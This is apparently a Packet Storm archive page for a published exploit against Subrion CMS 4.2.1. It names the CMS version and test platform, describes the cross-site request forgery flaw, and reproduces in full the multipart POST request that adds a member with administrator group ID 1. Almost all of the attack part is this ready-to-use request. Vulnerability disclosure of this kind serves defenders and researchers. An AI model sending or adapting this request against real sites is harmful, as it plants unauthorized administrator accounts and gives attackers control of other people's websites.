exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Subrion CMS 4.2.1 Cross Site Request Forgery

Subrion CMS 4.2.1 Cross Site Request Forgery
Posted Feb 11, 2022
Authored by Aryan Chehreghani

Subrion CMS version 4.2.1 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 6e6c416fadc87a9d274f7f783f9c8782d76e31148c30267089cca8b546eb9276

Subrion CMS 4.2.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
# Date: 2022-02-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://subrion.org
# Software Link: https://subrion.org/download
# Version: 4.2.1
# Tested on: Windows 10

# [ About - Subrion CMS ]:
#Subrion is a PHP/MySQL based CMS & framework,
#that allows you to build websites for any purpose,
#Yes, from blog to corporate mega portal.

# [ Description ]:
# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,
# With this vulnerability, authorized users can be added to the system.

# [ Sample CSRF Request ]:

POST /subrion/panel/members/add/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902
Content-Length: 2522
Origin: http://localhost
Connection: close
Referer: http://localhost/subrion/panel/members/add/
Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="__st"

YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="username"

Aryan
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="fullname"

AryanChehreghani
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email"

aryanchehreghani@yahoo.com
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password"

Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password2"

Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="usergroup_id"

1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="website"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="phone"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="biography"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="facebook"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="twitter"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="gplus"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="linkedin"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email_language"

en
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="sponsored"

0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured"

0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured_end"

2022-03-09 12:03
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="status"

active
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="save"

1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="goto"

list
-----------------------------386122140640094420852486902--

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close